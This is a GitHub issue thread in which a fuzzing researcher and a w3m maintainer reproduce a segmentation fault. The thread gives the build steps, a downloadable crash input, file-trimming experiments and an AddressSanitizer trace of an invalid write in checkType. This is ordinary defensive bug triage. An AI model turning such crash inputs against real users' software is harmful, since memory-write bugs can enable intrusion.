    wget https://github.com/tats/w3m/files/9276657/poc0.zip && unzip poc0.zip
    ./w3m -dump ./poc0
    
    

Pls told me if it's still not available. I could try to reduce the input file later. But I guess it's environment's fault.

Copy link

Contributor

****rkta** commented Aug 10, 2022**

On Tue, Aug 09, 2022 at 08:36:15AM -0700, Han Zheng wrote: I try debian stable in docker image and it still works.

I wonder if Docker plays a role here.

\> I currently don't have time to setup a VM, maybe at the weekend, sorry. I mean install docker in your debian and copy following command : \`\`\` docker pull ubuntu:22.04 && docker run -it ubuntu:22.04 bash ## now step into the container apt update && apt install wget git unzip gcc g++ make libgc-dev libtinfo-dev -y git clone https://github.com/tats/w3m && pushd w3m export CC="gcc -fsanitize=address -g" && ./configure --disable-shared && make -j8 wget https://github.com/tats/w3m/files/9276657/poc0.zip && unzip poc0.zip ./w3m -dump ./poc0 \`\`\` Pls told me if it's still not available.

Yes, can reproduce this way.

I could try to reduce the input file later.

Works: head -c 9215 poc0 | ./w3m -dump Does not work: tail -c 9215 poc0 | ./w3m -dump head -c 9216 poc0 | tail -c 9215 | ./w3m -dump

Copy link

Author

****kdsjZh** commented Aug 10, 2022 •**

I guess it's not docker. I try to reproduce it in my psychical Desktop (ubuntu 21.10) and success with following command

    ./w3m -dump crashes/id\:000001\,sig\:11\,src\:000876\,time\:8063946\,execs\:818201\,op\:MOpt_core_havoc\,rep\:8
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==3904622==ERROR: AddressSanitizer: SEGV on unknown address 0x7f186ce09ffe (pc 0x55c246d22787 bp 0x7f186ce09ffe sp 0x7ffe334beb20 T0)
    ==3904622==The signal is caused by a WRITE memory access.
        #0 0x55c246d22787 in checkType /home/kdsj/workspace/benchmarks/reproduce/w3m/etc.c:441
        #1 0x55c246ce65c2 in loadBuffer /home/kdsj/workspace/benchmarks/reproduce/w3m/file.c:7717
        #2 0x55c246d0c074 in loadSomething /home/kdsj/workspace/benchmarks/reproduce/w3m/file.c:230
        #3 0x55c246d0c074 in loadGeneralFile /home/kdsj/workspace/benchmarks/reproduce/w3m/file.c:2286
        #4 0x55c246ca785d in main /home/kdsj/workspace/benchmarks/reproduce/w3m/main.c:1053
        #5 0x7f186fc77fcf in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #6 0x7f186fc7807c in __libc_start_main_impl ../csu/libc-start.c:409
        #7 0x55c246cab264 in _start (/home/kdsj/workspace/benchmarks/reproduce/w3m/w3m+0xb3264)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/kdsj/workspace/benchmarks/reproduce/w3m/etc.c:441 in checkType
    ==3904622==ABORTING
    

but when try to rename it to poc0, it failed

    ./w3m -dump crashes/poc0
            ???????????p???�???*��?&?*?p???�???     �???????????????????���???????
    

Although I check again and make sure they're the same crash with same hash....  
I guess the name is to be blamed? or there might be some random factor?

Tag

#debian